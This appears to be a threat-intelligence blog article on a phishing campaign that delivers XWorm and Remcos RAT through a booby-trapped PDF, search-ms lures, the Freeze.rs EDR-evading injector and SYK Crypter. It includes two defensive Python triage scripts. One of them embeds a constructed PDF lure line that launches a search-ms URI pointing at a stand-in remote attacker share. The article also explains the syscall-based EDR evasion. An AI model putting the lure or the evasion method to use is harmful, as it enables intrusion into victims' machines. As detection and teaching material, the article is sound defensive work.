
The Rise of XWorm and Remcos RAT: A Lethal Threat to Critical Infrastructure


Weaponized Rust-based Injector Used in Sophisticated Phishing Campaign

Introduction

In a recent discovery, Fortinet's FortiGuard Labs uncovered a sophisticated phishing campaign targeting victims in Europe and North America. The campaign uses a Rust-based injector called Freeze[.]rs and distributes malware through a malicious PDF file crafted to evade endpoint detection and response (EDR) systems. Fortinet's analysis found several malware families in play, including XWorm and Remcos RAT, pointing to the complexity and sophistication of the attack.

Attack Chain and Techniques

The investigation by FortiGuard Labs reveals that the Freeze[.]rs injector, a tool originally built for bypassing EDR security measures, plays a crucial role in the attack chain. The attacker delivers the payload with a booby-trapped PDF and the Windows "search-ms" protocol: JavaScript embedded in the PDF invokes a search-ms URI, which opens a Windows Explorer window whose contents are served from a remote server. That window shows a deceptive LNK file carrying a PDF icon, so the file appears to come from the victim's own system.
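To make that lure pattern concrete, here is an added example (my code, not FortiGuard's and not anything recovered from the campaign) of a triage script that inflates a PDF's streams and flags JavaScript that hands Explorer a search-ms URI whose crumb points at a remote UNC location. The sample PDF, its JavaScript and the 203.0.113.10 address are constructed for the demo; the regular expressions are a loose triage filter, not a full PDF parser.

```python
"""Triage a PDF for JavaScript that launches a search-ms: URI (added example)."""
import re
import zlib

SEARCH_MS_RE = re.compile(rb"search-ms:[^\s\"')]+", re.IGNORECASE)
# crumb=location:\\host\share makes Explorer render a remote share like a local folder
UNC_CRUMB_RE = re.compile(rb"crumb=location:\\\\", re.IGNORECASE)
JS_KEY_RE = re.compile(rb"/(JavaScript|JS)\b")
# stream dictionary (one level of nesting) followed by the stream body
STREAM_RE = re.compile(
    rb"<<((?:[^<>]|<<[^<>]*>>)*)>>\s*stream\r?\n(.*?)endstream", re.DOTALL
)


def extract_streams(pdf: bytes):
    """Yield the content of each stream object, inflating /FlateDecode streams."""
    for m in STREAM_RE.finditer(pdf):
        dictionary, body = m.group(1), m.group(2)
        if b"/FlateDecode" in dictionary:
            try:
                # decompressobj tolerates the newline that precedes 'endstream'
                body = zlib.decompressobj().decompress(body)
            except zlib.error:
                pass  # corrupt or multi-filter stream: scan the raw bytes instead
        yield body


def scan_pdf(pdf: bytes) -> dict:
    """Return search-ms indicators found in the raw file and its inflated streams."""
    surfaces = [pdf, *extract_streams(pdf)]
    uris = {u.decode("latin-1") for s in surfaces for u in SEARCH_MS_RE.findall(s)}
    has_js = any(JS_KEY_RE.search(s) for s in surfaces)
    remote = any(UNC_CRUMB_RE.search(s) for s in surfaces)
    return {
        "has_javascript": has_js,
        "search_ms_uris": sorted(uris),
        "remote_location": remote,
        # JavaScript + search-ms + remote crumb is the lure pattern in the text
        "suspicious": has_js and bool(uris) and remote,
    }


# --- constructed sample (not a real campaign document) ----------------------
# 203.0.113.10 is a documentation address standing in for the attacker's server;
# the doubled backslashes are JavaScript string escaping of a UNC path.
LURE_JS = (
    b'app.launchURL("search-ms:query=Invoice.pdf&displayname=Downloads'
    b'&crumb=location:\\\\\\\\203.0.113.10\\\\share", true);'
)
BENIGN_JS = b"app.alert('Thank you for reading.');"


def build_sample_pdf(js: bytes) -> bytes:
    """Build a minimal PDF whose OpenAction runs `js` from a Flate-compressed stream."""
    stream = zlib.compress(js)
    header = (
        b"%PDF-1.7\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
        b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n"
        b"4 0 obj << /Length " + str(len(stream)).encode() + b" /Filter /FlateDecode >>\n"
    )
    return (header + b"stream\n" + stream
            + b"\nendstream\nendobj\ntrailer << /Root 1 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    for name, js in (("lure", LURE_JS), ("benign", BENIGN_JS)):
        print(name, scan_pdf(build_sample_pdf(js)))
```

The remote crumb is the discriminating signal: JavaScript in a PDF is common, and search-ms itself is a legitimate Windows handler, but a crumb whose location is a UNC path is what turns the Explorer window into a remote file listing that the victim mistakes for a local one.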

Cara Lin, a researcher at FortiGuard Labs, explains that the Freeze[.]rs injector achieves its evasion by calling NT syscalls directly to inject the shellcode, skipping the standard kernelbase.dll API calls that could be hooked. By creating a process in a suspended state, only a minimal set of DLLs is loaded and no EDR-specific DLLs are present yet, so the syscall stubs within ntdll.dll remain unaltered. This tactic takes advantage of the lag before EDR systems start hooking and patching the assembly of system DLLs within a process.

The attack also uses SYK Crypter, a tool commonly used to distribute malware via the Discord chat platform. The crypter loads Remcos, a sophisticated remote access Trojan adept at controlling and monitoring Windows devices. SYK Crypter copies itself to the Startup folder for persistence, stores its configuration encrypted and decrypts it only at run time, and keeps the compressed payload encrypted inside a resource for obfuscation, which makes static analysis considerably harder. Overall the malware relies on a multi-layered strategy of encoding, string obfuscation, and payload encryption.
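As an added example (my code, not SYK Crypter's and not FortiGuard's), the following script shows the two static indicators just described on a constructed sample: an embedded payload that was zlib-compressed and then XORed, which stands out as a high-entropy region, and a Startup-folder path string. The loader bytes, the payload and the key SYK_KEY are all invented for the demo; the page does not describe the real crypter's cipher or resource layout, so repeating-key XOR is a stand-in for whatever it actually uses.

```python
"""Static triage for a crypter-style loader (added example)."""
import math
import re
import zlib
from collections import Counter
from typing import Optional

SYK_KEY = b"demo-key"  # invented XOR key for the constructed sample, not a real constant
STARTUP_RE = re.compile(rb"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the key phase restarts at data[0]."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def shannon_entropy(chunk: bytes) -> float:
    """Bits per byte: close to 8 for encrypted or compressed data, 4 to 5 for text."""
    n = len(chunk)
    return -sum(c / n * math.log2(c / n) for c in Counter(chunk).values())


def high_entropy_regions(data: bytes, window: int = 512, step: int = 256,
                         threshold: float = 7.0) -> list:
    """Slide a window over data and merge overlapping windows above threshold."""
    regions = []
    for off in range(0, max(len(data) - window, 0) + 1, step):
        if shannon_entropy(data[off:off + window]) >= threshold:
            if regions and off <= regions[-1][1]:
                regions[-1][1] = off + window  # extend the open region
            else:
                regions.append([off, off + window])
    return [(s, e) for s, e in regions]


def triage(data: bytes) -> dict:
    """Combine the entropy and persistence indicators into a verdict."""
    regions = high_entropy_regions(data)
    persistence = bool(STARTUP_RE.search(data))
    return {
        "high_entropy_regions": regions,
        "largest_blob_bytes": max((e - s for s, e in regions), default=0),
        "startup_persistence": persistence,
        "suspicious": bool(regions) and persistence,
    }


def recover_payload(data: bytes, region: tuple, key: bytes,
                    slack: int = 512) -> Optional[bytes]:
    """Locate and inflate the zlib stream inside a flagged region once the XOR is removed.

    A zlib header has CMF == 0x78 and (CMF << 8 | FLG) % 31 == 0; a wrong offset or
    key almost never passes both checks, so the first offset that does is the blob
    start. Regions are window-aligned, so the search begins `slack` bytes early.
    Decompression runs to end of file: decompressobj stops at the end of the stream
    by itself and ignores whatever follows.
    """
    start, end = region
    for off in range(max(0, start - slack), min(end, len(data) - 1)):
        cmf, flg = data[off] ^ key[0], data[off + 1] ^ key[1]
        if cmf != 0x78 or ((cmf << 8) | flg) % 31:
            continue
        try:
            return zlib.decompressobj().decompress(xor_bytes(data[off:], key))
        except zlib.error:
            continue
    return None


# --- constructed sample (nothing here is a real loader or payload) -----------
FAKE_PAYLOAD = b"".join(
    b"cmd_%04x=%08x;" % (i, (i * 2654435761) & 0xFFFFFFFF) for i in range(600)
)


def build_sample_loader() -> tuple:
    """Return (binary, blob_start, blob_end): readable PE-like strings around a payload
    that was zlib-compressed and then XORed, the way a crypter stores a resource."""
    blob = xor_bytes(zlib.compress(FAKE_PAYLOAD, 9), SYK_KEY)
    head = b"MZ" + b"This program cannot be run in DOS mode.\r\n" * 40
    tail = (rb"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" + b"\x00"
            + b"kernel32.dll\x00CreateFileW\x00WriteFile\x00CloseHandle\x00" * 40)
    return head + blob + tail, len(head), len(head) + len(blob)


if __name__ == "__main__":
    binary, blob_start, blob_end = build_sample_loader()
    report = triage(binary)
    print(report, "blob really at", (blob_start, blob_end))
    payload = recover_payload(binary, report["high_entropy_regions"][0], SYK_KEY)
    print("recovered", len(payload or b""), "payload bytes")
```

Entropy alone flags any packed or compressed resource, so the script pairs it with the persistence string before calling the file suspicious; the recovery step is only possible here because the demo key is known, but the header check it uses (CMF 0x78 and a multiple of 31) is the same test an analyst applies when guessing where a decoded resource begins.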

Implications and Risks

This campaign highlights the evolving threat of phishing and other messaging-based attacks. The research notes that 97% of companies have experienced at least one email phishing attack in the past 12 months, with significant costs expected from these attacks. Phishing is becoming smarter and more targeted, adapting to new technology and user behavior and drawing on techniques such as mobile exploits, brand impersonation, and AI-generated content.

The use of sophisticated malware like XWorm and Remcos RAT can have severe consequences for victims, including the loading of ransomware and the establishment of persistent backdoors on compromised systems. The involvement of the Freeze[.]rs injector and SYK Crypter shows how readily attackers adopt and weaponize existing tools and technologies for their campaigns.

Defending Against Phishing Attacks

As the threat of phishing attacks continues to grow, it is crucial for individuals and organizations to implement effective defense measures. The research highlights several recommendations to mitigate the risk of phishing:

1. Maintain up-to-date software: Keeping all software, including operating systems and applications, up-to-date is critical for closing vulnerabilities that attackers may exploit. Regularly installing security patches and updates can help protect against known vulnerabilities used in phishing attacks.

2. Provide regular training: Educating employees and individuals about the various techniques used in phishing attacks is essential. Regular training can help users identify suspicious emails, attachments, and links, minimizing the likelihood of falling victim to phishing attempts.

3. Use advanced security tools: Deploying advanced security tools such as email filters, firewalls, and anti-malware software can provide an additional layer of protection against phishing campaigns. These tools can help detect and block malicious emails, attachments, and URLs.

4. Conduct phishing simulation training: Phishing simulation training, particularly in critical infrastructure organizations, has shown promising results. By exposing employees to simulated phishing attacks and providing feedback and training, organizations can improve their ability to recognize and report real malicious emails.

Conclusion

The weaponization of the Rust-based injector Freeze[.]rs in a sophisticated phishing campaign highlights the evolving tactics employed by cybercriminals. The use of multiple layers of obfuscation, encryption, and deception techniques demonstrates the level of sophistication exhibited by attackers.

To mitigate the risk of falling victim to phishing attacks, individuals and organizations must prioritize internet security through regular software updates, employee training, and the utilization of advanced security tools. By implementing these measures, individuals and organizations can better defend against the mounting phishing risk and protect themselves from the potentially devastating consequences of these attacks.
